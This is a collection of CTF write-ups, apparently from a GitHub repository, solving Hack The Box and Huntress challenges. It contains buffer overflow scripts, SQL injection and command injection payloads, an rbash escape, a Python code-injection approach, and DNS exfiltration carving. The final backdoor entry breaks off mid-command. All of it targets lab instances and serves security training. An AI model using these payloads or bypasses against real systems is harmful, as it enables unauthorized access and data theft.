![image](https://user-images.githubusercontent.com/80063008/227535247-987f73a6-9e85-46de-ab70-d7d3f9c64ce6.png) 18 | 19 | HTB{y0u_h4v3_p0w3rfuL_sCr1pt1ng_ab1lit13S!} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Misc/Restricted.md: -------------------------------------------------------------------------------- 1 | In this challenge we get a docker and, in the Dockerfile, we can see that an rbash shell is created for the user. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227537610-78c05960-ea45-42d2-9d19-588d39c84314.png) 4 | 5 | We can bypass this when we SSH into the machine using `-t 'bash -noprofile'` 6 | 7 | ```bash 8 | ssh restricted@134.122.102.219 -p 31219 -t 'bash -noprofile' 9 | ``` 10 | 11 | This allows us to no longer be restricted and exit our home directory and read the flag: 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/227537791-cafce5e9-5b5a-4668-94b3-f4f7c0e234bd.png) 14 | 15 | HTB{r35tr1ct10n5_4r3_p0w3r1355} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Pwn/Getting_Started.md: -------------------------------------------------------------------------------- 1 | They provided a solver script directly: 2 | 3 | ```python 4 | #!/usr/bin/python3.8 5 | 6 | ''' 7 | You need to install pwntools to run the script. 8 | To run the script: python3 ./wrapper.py 9 | ''' 10 | 11 | # Library 12 | from pwn import * 13 | 14 | # Open connection 15 | IP = '165.232.108.236' # Change this 16 | PORT = 30356 # Change this 17 | 18 | r = remote(IP, PORT) 19 | 20 | # Craft payload 21 | payload = b'A' * 50 # Change the number of "A"s 22 | 23 | # Send payload 24 | r.sendline(payload) 25 | 26 | # Read flag 27 | success(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}') 28 | ``` 29 | ![image](https://user-images.githubusercontent.com/80063008/227555460-fcca80e5-39d2-4b63-978f-48bf52fb301e.png) 30 | 31 | HTB{b0f_s33m5_3z_r1ght?} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Pwn/Initialise_Connection.md: -------------------------------------------------------------------------------- 1 | This is the entire challenge: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227548195-89c880e3-045d-47a9-9045-c144e02c983c.png) 4 | 5 | HTB{g3t_r34dy_f0r_s0m3_pwn} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Pwn/Labyrinth.md: -------------------------------------------------------------------------------- 1 | Through experimentation we find that the buffer overflow happens at 56 characters. We see a function called `escape_plan` that opens and reads the flag so we need to jump to that. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227556505-c3fb8ab8-6252-4712-8917-68d6be77269a.png) 4 | 5 | The address can be found using gdb: 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227556670-464f1ccd-7578-416c-88e2-b71f08b960a0.png) 8 | 9 | However, jumping at that address was only printing the ASCII artwork showing success but not the flag. I assumed the flag is printed after that so I moved to `0x401256` and got the flag. 10 | 11 | My script to jump the required function: 12 | 13 | ```python 14 | #!/usr/bin/python3 15 | 16 | from pwn import * 17 | 18 | # io = process('./labyrinth') 19 | io = remote('165.232.108.200', 32639) 20 | 21 | io.recvuntil(b'>> ') 22 | io.sendline(b'69') 23 | io.recvuntil(b'>> ') 24 | 25 | payload = b'A' * 56 26 | payload += p64(0x401256) 27 | 28 | io.sendline(payload) 29 | io.interactive() 30 | ``` 31 | 32 | ![image](https://user-images.githubusercontent.com/80063008/227555677-e7533c8b-193f-4f73-8049-6fcc11d10737.png) 33 | 34 | HTB{3sc4p3_fr0m_4b0v3} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/README.md: -------------------------------------------------------------------------------- 1 | I got to 270th out of 6483 teams, 36/74 solves... that's top 4.30%. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227562024-e3edea10-a0dd-43f6-b4f1-62edc1be566d.png) 4 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Reversing/Needle_in_a_haystack.md: -------------------------------------------------------------------------------- 1 | This was easily solvable by running strings on the application and grepping for HTB: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227561821-357d2201-6d08-4955-9fd4-d58c05bd16d8.png) 4 | 5 | HTB{d1v1ng_1nt0_th3_d4tab4nk5} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Reversing/Shattered_Tablet.md: -------------------------------------------------------------------------------- 1 | For this challenge, I opened the provided binary in Ghidra and saw how the flag is printed. This is the order of the variables: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227557469-27867564-fd9f-420f-a346-cc4b0d8a7466.png) 4 | 5 | We can see each character associated with each variable. We just need to put them in the right order: local_48 -> local_48_1_1 -> local_48_2_1 etc. 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227557623-f3577982-0c6c-48e5-9f79-9b7c1b6a5202.png) 8 | 9 | I did it manually and got the flag but I'm sure there are easier ways: 10 | 11 | HTB{br0k3n_4p4rt,n3ver_t0_b3_r3p41r3d} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Web/Drobots.md: -------------------------------------------------------------------------------- 1 | We have a login screen: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227565559-a92252df-97d9-48dd-8c3f-f58b3658a5e0.png) 4 | 5 | The first thing we try on a login screen is SQL injection. I tried `' or 1=1-- -` but that didn't work, so let's try double quotes instead of single quotes: `" or 1=1-- -` 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227565836-c9078718-9819-4987-a1cb-46eb644b2981.png) 8 | 9 | HTB{p4r4m3t3r1z4t10n_1s_1mp0rt4nt!!!} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Web/Gunhead.md: -------------------------------------------------------------------------------- 1 | In the next challenge the main page looks like this: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227564667-86655478-7c9a-4339-b1d2-b638d44e6b99.png) 4 | 5 | We see the icon of a terminal on the right side and if we click on it, we get the following menu: 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227564816-c80127f9-66a9-4576-a2e1-1fb34dad20d8.png) 8 | 9 | Trying command injection we get the flag: 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/227565246-dfbcbfad-c6b3-4e01-9f34-a71b632caf81.png) 12 | 13 | HTB{4lw4y5_54n1t1z3_u53r_1nput!!!} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2023/Web/Trapped_Source.md: -------------------------------------------------------------------------------- 1 | For the first web challenge, we get a picture of a lock requesting a pin: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/227563989-a43e08ef-f4a1-48d4-8c5f-857584704bcf.png) 4 | 5 | Reading the source code by pressing CTRL+U or any other means, we see a pin: 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/227564131-d8cc5930-219d-4e06-bf69-fe231eb314a7.png) 8 | 9 | We get the flag after entering the correct pin: 8291 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/227564289-08ce93a5-3d61-49ab-9628-ea2c7211e79c.png) 12 | 13 | HTB{V13w_50urc3_c4n_b3_u53ful!!!} -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Crypto/Makeshift.md: -------------------------------------------------------------------------------- 1 | # Makeshift 2 | 3 | ## Solution 4 | For this challenge, we get an output.txt and source.py file. 5 | 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/196697f0-7717-4d2f-9d9d-dbc261bb2504) 7 | 8 | The output.txt contains: 9 | 10 | ``` 11 | !?}De!e3d_5n_nipaOw_3eTR3bt4{_THB 12 | ``` 13 | 14 | And the source.py contains the python code: 15 | 16 | ```python3 17 | from secret import FLAG 18 | 19 | flag = FLAG[::-1] 20 | new_flag = '' 21 | 22 | for i in range(0, len(flag), 3): 23 | new_flag += flag[i+1] 24 | new_flag += flag[i+2] 25 | new_flag += flag[i] 26 | 27 | print(new_flag) 28 | ``` 29 | No changes are required here really: 30 | 31 | ```python3 32 | flag = '!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB'[::-1] 33 | new_flag = '' 34 | 35 | for i in range(0, len(flag), 3): 36 | new_flag += flag[i+1] 37 | new_flag += flag[i+2] 38 | new_flag += flag[i] 39 | 40 | print(new_flag) 41 | ``` 42 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/42068fd7-bf7d-4e08-8aac-2d2e856ba934) 43 | 44 | `HTB{4_b3tTeR_w3apOn_i5_n3edeD!?!}` 45 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Forensics/It_Has_Begun.md: -------------------------------------------------------------------------------- 1 | # It Has Begun 2 | 3 | ## Enumeration 4 | The first very easy forensics challenge provides a bash script: 5 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d8d81baa-34e2-4e65-b225-dab9e13c71d2) 6 | 7 | ## Solution 8 | Within it, we find the first part of the flag, but reversed: 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8183fdf1-d7d0-4ad2-b903-8c35d40d012d) 10 | 11 | No worries, we can reverse it back in the terminal using `rev`: 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2da3e7c4-8dd5-442e-abb0-c5263c616426) 13 | 14 | Further down in the script, we see a base64 string so let's decode it: 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4ceb0340-1cae-4a01-b73c-ee819887865a) 16 | 17 | Now that we have the first and second part of the flag, we put it together and submit it: 18 | `HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}` 19 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Hardware/BunnyPass.md: -------------------------------------------------------------------------------- 1 | # BunnyPass 2 | 3 | ## Solution 4 | 5 | As the description mentions, we are given access to a RabbitMQ instance with default credentials: 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f5e2f810-cbfe-4063-94ab-afd246424236) 7 | 8 | As it can easily be found on the internet, the default creds for RabbitMQ are `guest:guest` and `admin:admin`. Both work in this instance but give the same level of access. 9 | 10 | This takes a bit of enumeration, figuring out the interface if you are not familiar with it, and eventually we get the flag in one of the messages from the Queues. 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/05dbb095-8ccd-4330-904e-2b0917173cf1) 12 | 13 | From the `factory_idle` queue, you can read the 6th message and get the flag: 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3ac57d48-013c-4e2a-bfa5-d36446bfea2a) 16 | 17 | `HTB{th3_hunt3d_b3c0m3s_th3_hunt3r}` 18 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Misc/Character.md: -------------------------------------------------------------------------------- 1 | # Character 2 | 3 | ## Solution 4 | 5 | We connect to the given IP and port and it asks us for an index. Starting from 0 going through 100+ we see that each index contains a letter of the flag. 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3cb33ab4-3aac-4dd8-a480-ac05b0be67c1) 7 | 8 | But there's too many to do manually: 9 | 10 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8e22c62a-ecd6-4e75-b5f1-8e25d5ed35e8) 11 | 12 | So I scripted it: 13 | 14 | ```python3 15 | from pwn import * 16 | 17 | r = remote('83.136.254.199', 30965) 18 | 19 | print('H', end='') 20 | r.recvuntil(b': ') 21 | for i in range(104): 22 | r.sendline(str(i).encode()) 23 | r.recvuntil(b': ') 24 | 25 | flag = r.recvline().decode().strip()[22:] 26 | flag = flag.replace(' ','') 27 | flag = flag.replace(':','') 28 | print(flag, flush=True, end='') 29 | ``` 30 | ![flag](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a520ce6c-eb16-408a-b01b-a38ed8fea6bb) 31 | 32 | `HTB{tH15_1s_4_r3aLly_l0nG_fL4g_i_h0p3_f0r_y0Ur_s4k3_tH4t_y0U_sCr1pTEd_tH1s_oR_els3_iT_t0oK_qU1t3_l0ng!!}` 33 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Misc/Stop_Drop_and_Roll.md: -------------------------------------------------------------------------------- 1 | # Stop Drop and Roll 2 | 3 | ## Solution 4 | We connect to the provided IP and port we are given instructions on how to complete the challenge: 5 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0fa1df91-60f1-45b3-8599-717f8f6d1784) 6 | 7 | We need to script something that will answer the challenge accordingly. Here's my script that just replaces the words: 8 | 9 | ```python3 10 | from pwn import * 11 | import warnings 12 | warnings.filterwarnings('ignore') 13 | 14 | r = remote('94.237.48.92', 37120) 15 | 16 | r.recvuntil(b')') 17 | r.sendline(b'y') 18 | r.recvline() 19 | 20 | while True: 21 | try: 22 | challenge = r.recvline().decode().strip() 23 | if 'FIRE' or 'ROLL' or 'PHREAK' in challenge: 24 | answer = challenge.replace('FIRE','ROLL').replace('PHREAK','DROP').replace('GORGE','STOP').replace(', ','-') 25 | r.recvuntil(b'? ') 26 | r.sendline(answer) 27 | else: 28 | print(challenge) 29 | except EOFError: 30 | print(challenge) 31 | break 32 | ``` 33 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/aa95cc10-1add-445a-873d-46ff02013db6) 34 | 35 | `HTB{1_wiLl_sT0p_dR0p_4nD_r0Ll_mY_w4Y_oUt!}` 36 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Pwn/Writing_on_the_Wall.md: -------------------------------------------------------------------------------- 1 | # Writing on the Wall 2 | 3 | ## Solution 4 | In this binary, when opened in [Ghidra](https://github.com/NationalSecurityAgency/ghidra), we can see it is assigning `6` bytes to local_le, local_18 is `8` bytes ending in a space and it actually reads just `7` bytes from our input which is local_le. 5 | 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6ff4f4fa-a08e-4837-b269-8e03000104b1) 7 | 8 | This means that when it reads our input, the [strcmp](https://www.programiz.com/cpp-programming/library-function/cstring/strcmp) stops at a null byte and compares it with a null byte. So we can just pass 7 null bytes to the program and the strcmp should be true: 9 | 10 | ```bash 11 | python -c 'print("\x00"*7)'|nc 94.237.56.26 56996 12 | ``` 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/22a78a1c-4d3a-4b10-86b9-867d1a7f4c8c) 14 | 15 | `HTB{3v3ryth1ng_15_r34d4bl3}` 16 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/README.md: -------------------------------------------------------------------------------- 1 | I got 243rd out of 5694 teams, 34/67 solves... that's top 4.26%. 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/ab142bb3-db05-4759-8c1b-2fd652ebe71c) 4 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Rev/BoxCutter.md: -------------------------------------------------------------------------------- 1 | # BoxCutter 2 | 3 | ## Solution 4 | Trying to run the binary directly, we get an error about a box not being found: 5 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7229bb65-d4e3-49f9-9d8b-73ec41aa0ba7) 6 | 7 | If we run it with `strace` however, we can see it is trying to access a file or directory that doesn't exist... because it's our flag: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/72695b07-f8c0-4048-8280-9ccfc2268038) 9 | 10 | We can also get it with `strace`: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9856733a-c422-4a51-ac9a-42b23f5b4cda) 12 | 13 | `HTB{tr4c1ng_th3_c4ll5}` 14 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Rev/Lootstash.md: -------------------------------------------------------------------------------- 1 | # Lootstash 2 | 3 | ## Solution 4 | Champions of any CTF, our dynamic duo: `strings` and `grep` get us a very easy flag. 5 | 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d8b7e32a-0fc8-44b3-94b3-b69f892e349a) 7 | 8 | HTB{n33dl3_1n_a_l00t_stack} 9 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Rev/PackedAway.md: -------------------------------------------------------------------------------- 1 | # PackedAway 2 | 3 | ## Solution 4 | Running strings on the provided binary, we can tell it is [UPX](https://upx.github.io/) packed: 5 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b77e2ef-1713-4621-b4d6-5ce98a7241a0) 6 | 7 | We can use upx to also unpack it: 8 | ```bash 9 | upx -d packed 10 | ``` 11 | Now that the binary is unpacked we can run strings on it and grep the flag: 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/36a0dcf8-c46f-4618-86b6-da36fab71f4f) 13 | 14 | `HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}` 15 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Web/Flag_Command.md: -------------------------------------------------------------------------------- 1 | # Flag Command 2 | 3 | ## Enumeration 4 | 5 | The web application provided starts as an old school game with prompts and we have to choose from some options: 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2c9804e7-e3cf-407a-adad-a273d5f711d1) 7 | 8 | We see it making a GET request to an API for some options: 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/14206fcf-7bf2-445b-8d97-1c96c1942ab8) 10 | 11 | Which shows us the possible commands: 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6dc4f8c1-6488-4d31-9e29-f582d70c6c52) 13 | 14 | ## Solution 15 | At the bottom we see a secret command. I wonder what that does if we input that instead of the expected commands: 16 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/12153139-6cd1-4781-b354-9d3a6e9f6bc3) 17 | 18 | Nice, we got the flag: 19 | `HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}` 20 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Web/KORP_Terminal.md: -------------------------------------------------------------------------------- 1 | # KORP Terminal 2 | 3 | ## Enumeration 4 | 5 | The web application shows a very nice old school login prompt: 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/876db01f-d0b7-49c1-850e-c6ee07b9a4e7) 7 | 8 | If we try a single quote we get a very helpful SQL error indicating a possible SQL Injection vulnerability: 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8ae2a9db-a3ba-41d6-9670-16ad6b5de537) 10 | 11 | ## Solution 12 | In this case SQLMap goes brrr. We don't need to conserve our time for the harder challenges ahead. 13 | ```bash 14 | sqlmap -r req.txt -p username --dbms=mysql --ignore-code 401 --dump 15 | ``` 16 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f3d0ba4a-c63e-46dd-9e9b-4f3db1f2549f) 17 | 18 | Easy crack with rockyou since it's one of the first passwords in the wordlist: 19 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f26d7b15-ca8d-43bf-a7a5-795a2284d6d1) 20 | 21 | After we log in, we get our flag: 22 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/473d9508-41fe-463a-9ec2-9c5b72488f31) 23 | 24 | `HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}` 25 | -------------------------------------------------------------------------------- /HTB - CyberApocalypse_2024/Web/TimeKORP.md: -------------------------------------------------------------------------------- 1 | # TimeKORP 2 | 3 | ## Enumeration 4 | 5 | The web application gives us the option to check what time it is, or what date it is: 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f0724e61-d804-486b-afb7-9025de74b838) 7 | 8 | However, from the source code, we can see that it's executing the `date` linux command and using our user input, the `format`, without being sanitized. 9 | 10 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6327ad50-c655-455d-8c05-e7192b921d70) 11 | 12 | From the Docker file, we can also see where the flag should be: 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/238fbd97-e8c1-4ace-8c01-a527083f051f) 14 | 15 | In this case, we simply need to close the single quote for the date command, add a semicolon, our command, add another semicolon and use another single quote for the stderr redirect. 16 | 17 | ## Solution 18 | Payload: `';cat /flag;'` 19 | 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fb2df9b0-0406-4d7d-8c7c-aeb2d1906ae1) 21 | 22 | Nice, we got the flag: 23 | `HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}` 24 | -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Forensics/Trick_or_Breach.md: -------------------------------------------------------------------------------- 1 | With strings we see a lot of DNS requests with a hex string in the subdomain: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/198271579-a7160e6f-fd59-4f1b-adef-68cc2b78419f.png) 4 | 5 | So there's been some DNS exfil done here. Carved it out with tshark and some awk action. I'm sure only tshark could've been used but I'm not that familiar with it and I was in a hurry. We can output the result into a file and see what it is. 6 | 7 | ```bash 8 | tshark -r capture.pcap -Y 'dns.resp.name'|awk '{print $13}'|awk -F "." '{print $1}' |xxd -r -p > mysterfile 9 | ```` 10 | ![image](https://user-images.githubusercontent.com/80063008/198272011-e132d952-f835-4ee4-b63b-6a3991a309f6.png) 11 | 12 | Looks like an Excel file. Let's open it (always be careful and take precautions when opening such files from the internet). 13 | 14 | ![image](https://user-images.githubusercontent.com/80063008/198272094-e1aaa5cc-4597-4ddb-98d4-96fe2e6b3c9c.png) 15 | 16 | HTB{M4g1c_c4nn0t_pr3v3nt_d4t4_br34ch} 17 | -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Forensics/Wrong_Spooky_Season.md: -------------------------------------------------------------------------------- 1 | Running strings on the provided pcap file we can see a string that looks like a reversed base64. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/198272330-0da311e8-bddb-4835-b44a-bd0cfe3f35a5.png) 4 | 5 | Copied it, echoed it, reversed it and base64 decoded it within the terminal. 6 | 7 | ```bash 8 | echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS"|rev|base64 -d 9 | ``` 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/198272437-c7bbd787-a20a-4fd4-969b-7f089d00ac4a.png) 12 | 13 | HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!} -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Pwn/Pumpkin_Stand.md: -------------------------------------------------------------------------------- 1 | When launching the given binary, we see some cool pumpking ASCII art, a current wallet of 1337 pumpcoins and the option to buy a shovel or a laser. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/198273526-fb1ac366-7461-429b-b4fa-1721010bc173.png) 4 | 5 | I experimented by giving it various numbers I thought it wouldn't expect. I noticed that when inputing a number starting with a 0, the current pumpcoins goes to a large number in the negative. 6 | 7 | This behaviour points to an Integer Overflow type of vulnerability. So I tried to buy a laser but when asking me how many I want, I gave it a large number like 999. I repeated the step and then the flag was revealed. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/198273561-2d26f8f1-43b4-46c3-9897-c5fec4db2f56.png) 10 | 11 | HTB{1nt3g3R_0v3rfl0w_101_0r_0v3R_9000!} -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/README.md: -------------------------------------------------------------------------------- 1 | I participated in HackTheBox HackTheBoo Halloween CTF and ended up 175th out of 6367. That's top 2.7%. This individual CTF was very fun and had some great challenges that make for good writeups. 2 | 3 | Here are my writeups for the challenges I solved. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/198297472-0bcd7e04-d41f-4b0b-8233-bcd346e0d4e7.png) 6 | ![image](https://user-images.githubusercontent.com/80063008/198292019-49d008ff-4a4a-4536-8fc6-0ce8dabc969e.png) 7 | 8 | -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Rev/Cult_Meeting.md: -------------------------------------------------------------------------------- 1 | Running the binary with `ltrace`, we can see it doing a string compare where the passphrase is leaked. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/198257408-bdd4e192-efa3-421f-bb45-958fb414a9bd.png) 4 | 5 | Connect to the challenge using netcat, give it the passphrase and get the flag. 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/198257515-a2ef9387-926b-42a4-8382-55f8613b9bea.png) 8 | 9 | HTB{1nf1ltr4t1ng_4_cul7_0f_str1ng5} -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Rev/EncodedPayload.md: -------------------------------------------------------------------------------- 1 | Nothing too fancy here. Running this binary with `strace`, we can see the flag is leaked right away. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/198257584-8df9b566-b00d-4003-868a-3ee2f0666ba1.png) 4 | 5 | Generally running pwn/rev binaries with ltrace and strace are some of the first things I do in CTFs. It can leak a lot of good information. 6 | 7 | HTB{PLz_strace_M333} -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Rev/Ghost_Wrangler.md: -------------------------------------------------------------------------------- 1 | I used radare2 to debug this application. 2 | 3 | Let's first input the binary into the debugger. 4 | 5 | ```bash 6 | r2 ghost 7 | ``` 8 | 9 | Analyze all the flags 10 | 11 | ```aaa``` 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/198257671-e14bf083-8654-4b22-bc03-5612ba488a25.png) 14 | 15 | List all functions 16 | 17 | ```afl``` 18 | 19 | ![image](https://user-images.githubusercontent.com/80063008/198257705-bbf7dcfa-d0dc-471c-acfd-417ad5dfa242.png) 20 | 21 | Disassembling any of the functions above using the `pdf` command along with the memory location of the function that is displayed next to it, we get the hard-coded string that is XORed with `0x13`. In this case, we dissasemble the function we care about, the `get_flag` function. 22 | 23 | ```pdf@0x00001155``` 24 | 25 | ![image](https://user-images.githubusercontent.com/80063008/198257751-30e224cc-f6d6-417a-a8f8-16965ed229ab.png) 26 | 27 | This string can also be found by running strings and the XOR operation can be seen using Ghidra as well. 28 | 29 | ![image](https://user-images.githubusercontent.com/80063008/198257910-904db281-a7e0-4ab8-85a3-9bea764213df.png) 30 | 31 | We can use CyberChef to apply the XOR operation and get the flag. 32 | 33 | ![image](https://user-images.githubusercontent.com/80063008/198257938-4794a12c-5bac-4124-9544-a65fecef18ec.png) 34 | 35 | HTB{h4unt3d_by_th3_gh0st5_0f_ctf5_p45t!} 36 | -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Rev/Ouija.md: -------------------------------------------------------------------------------- 1 | We can simply run strings on this binary. `-n 10` is to show strings 10 chars or larger. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/198258137-da52673a-9fdd-4a18-86dc-ace891409d4f.png) 4 | 5 | We have something in the flag format. I recognize it as being rotated. I put it in CyberChef and rotate it until I get the flag. 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/198258172-bc062749-b2b1-462e-bd95-a771ba0fb715.png) 8 | 9 | HTB{Adding_sleeps_to_your_code_makes_it_easy_to_optimize_later!} -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Web/Evaluation_Deck.md: -------------------------------------------------------------------------------- 1 | In this challenge we see a website with some cards that we can click on. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/198007212-69ecbdd8-7bb0-4135-ac13-dde897e7d58a.png) 4 | 5 | In the source code provided, we notice that there is an exec() function which executes code. It is taking the integers of the current_health and attack_power however the `operator` is taken directly from the user input. 6 | 7 | ![image](https://user-images.githubusercontent.com/80063008/198007296-86cecbc7-14db-4439-88c2-c55332bb012c.png) 8 | 9 | This is how a normal POST request looks like when we click on a card. 10 | 11 | ![image](https://user-images.githubusercontent.com/80063008/198008086-8a6e51ac-9a17-4738-930e-3e53754acd34.png) 12 | 13 | Since there is no input sanitation, we can inject python code into the `operator` key and get a reverse shell: 14 | 15 | ![image](https://user-images.githubusercontent.com/80063008/198008340-0da1a18c-172f-4a11-9dc8-2961f509d0b5.png) 16 | 17 | ![image](https://user-images.githubusercontent.com/80063008/198008388-7242063d-ac5d-4685-b2c8-dca6be0f7143.png) 18 | 19 | Alternatively, we can simply read the flag directly in the Response with the payload below: 20 | 21 | ```;f = open('/flag.txt', 'r'); result = f.read();``` 22 | 23 | HTB{c0d3_1nj3ct10ns_4r3_Gr3at!!} -------------------------------------------------------------------------------- /HTB - HackTheBoo_2022/Web/Juggling_Facts.md: -------------------------------------------------------------------------------- 1 | The title of this challenge gave the attack away immediately for me. As soon as I saw that the source code is PHP I knew this is a Type Juggling vulnerability. 2 | 3 | We can see in the source code, specifically the entrypoint.sh file, that the flag is in secrets. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/198254556-ec45546c-61f1-4ba8-b074-9a8d7d637a8c.png) 6 | 7 | We try to read that but get the error that it can only be accessed from the localhost. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/198254660-b7e73e6c-304d-4ff6-9dee-9db71b16a8a7.png) 10 | 11 | We switch the type to boolean `true` and we get the flag. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/198254713-c0197a98-bd59-4045-83e7-8419ce52c3ae.png) 14 | 15 | HTB{sw1tch_stat3m3nts_4r3_vuln3r4bl3!!!} 16 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Forensics/Backdoored_Splunk.md: -------------------------------------------------------------------------------- 1 | # Backdoored Splunk 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5e917244-7df1-44ff-92ac-90dc5ae7d2ab) 5 | 6 | ### Solution 7 | There were a lot of files in this archive but one particular one drew my attention, `nt6-health.ps1`. It didn't take me long to find because I was thinking like an attacker and prioritized looking at the scripts first. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b8402b6-fe2d-4856-9e8b-3494dcbcaa8e) 10 | 11 | In this script, we can see an Invoke-WebRequest is made with a specific value for a Basic authorization.... We can replicate that using curl: 12 | 13 | ```bash 14 | curl -s -H 'Authorization: Basic 